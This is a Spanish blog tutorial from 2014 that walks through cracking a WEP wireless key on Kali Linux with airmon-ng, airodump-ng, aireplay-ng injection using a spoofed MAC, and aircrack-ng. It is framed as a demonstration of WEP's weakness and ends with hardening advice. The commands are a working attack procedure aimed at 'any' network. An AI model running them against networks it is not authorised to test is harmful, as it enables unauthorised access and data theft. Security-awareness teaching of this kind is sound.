Obtener claves de redes inalámbricas con encriptación WEP con kali linux
lunes, mayo 19th, 2014El afán de éste artículo es el de demostrar la facilidad con la que se puede obtener la clave de cualquier red inalámbrica con encriptación WEP. Existen apps que muestran la clave prácticamente al instante de muchas redes con encriptación WEP, sin embargo con éste método se puede obtener cualquiera. Dicha encriptación no es segura en lo absoluto por lo que nuestra red está expuesta a que cualquiera se conecte, con las consecuencias que conlleva eso (la más obvia y tal vez menos peligrosa el consumo de nuestro ancho de banda, o bien robo de datos, contraseñas, etc).
En esta ocasión usaremos kali linux, la versión al momento de escribir esto es la 1.0.6
Una vez arrancado el sistema abrimos una terminal y ejecutamos el siguiente comando
ifconfig
Con este sabremos cual es nuestra tarjeta de red. En mi caso wlan0, luego ejecutamos
airmon-ng stop wlan0
airmon-ng start wlan0
Al ejecutar esos comandos nos dira que hay procesos que pueden causar conflicto con la tarjeta en modo monitor. El comando nos indicará cuales son y sus pid. Para matarlos lo hacemos con el comando
kill -9 **** ****
Donde **** son los pid de los procesos a matar.
El resultado del comando anterior también nos indicará que la tarjeta en modo monitor estará en el dispositivo mon0.
Lo siguiente ahora será identificar la red que queremos crackear, para ello ejecutamos.
airodump-ng mon0
De la lista superior seleccionamos alguna de las redes que tengan encriptacion wep y que tenga buena potencia. Una vez elegida copiamos el canal, el bssid (mac address) y el essid (nombre de la red) y salimos del programa presionando ctrl+c.
Ahora toca iniciar la captura de paquetes encriptados, el primer paso para lograrlo es ejecutando.
airodump-ng -w salida --ivs --channel * mon0
El * representa el canal en que trabaja la red seleccionada, los datos recabar ivs se vaciaran en el archivo salida01.ivs en el directorio donde estemos trabajando
Dejamos trabajando airodump y abrimos otra pestaña de terminal.
El siguiente paso será vincular o autenticar nuestra tarjeta mon0 con la red selecionada, ejecutamos
aireplay-ng -1 30 -a xx:xx:xx:xx:xx:xx -e MOTIONFLUX -h 66:55:44:33:22:11 mon0
donde MOTIONFLUX es el ESSID
xx:xx:xx:xx:xx:xx es el BSSID. los numeros 66:55:44:33:22:11 ponerlos tal cual, con eso logramos cambiar la mac address de nuestra tarjeta y vincularla con el access point destino.
Después de ejecutar el comando anterior, la salida debe contener “authentification succesfull “si no es así, debemos repetirlo hasta que lo diga. Es muy importante tener vinculada la tarjeta ya que si no es así la inyección de paquetes a la red en cuestión será extremadamente lenta.
Una vez vinculado ahora vamos a inyectar paquetes para generar el trafico necesario entre el access point y nuestra tarjeta.
Abrir una terminal y ejecutar el comando siguiente.
aireplay-ng -3 -a xx:xx:xx:xx:xx:xx -e MOTIONFLUX -h 66:55:44:33:22:11 ath0
nuevamente los valores xx:xx:xx:xx:xx:xx y MOTIONFLUX son el BSSID y ESSID que obtuvimos anteriormente.
Si todo está bien se generará trafico relativamente rápido, en unos 5min se habrán transmitido 20000 paquetes ivs que requerimos, en la ventana del airodump la columna “#Data” corresponde a esos paquetes.
Cuando lleguemos a 20000, lo que vamos a hacer es copiar el archivo ivs que se está generando y probar si con ese número de paquetes es suficiente para obtener la clave.
en una terminal ejecutamos.
cp salida-01.ivs salidatest.ivs
Y para obtener la clave ejecutamos
aircrack-ng -a 1 -s -e MOTIONFLUX salidatest.ivs
En caso de que no encuentre la clave, dejamos que se generen más paquetes ivs (25000 o más), y volvemos a intentar.
Todo el proceso puede tomar escasos 5-10min.
De ahí la importancia de cambiar la seguridad de nuestras redes inalámbricas.
Las recomendaciones básicas son:
Utilizar seguridad WPA2 PSK y deshabilitar el WPS. Aunque debemos recordar y tener en cuenta que cualquier tecnología es falible, por ello debemos tomar precauciones todo el tiempo y tratar de poner varias capas de seguridad. Todos los servicios de recursos compartidos en la red deben ir siempre con contraseñas.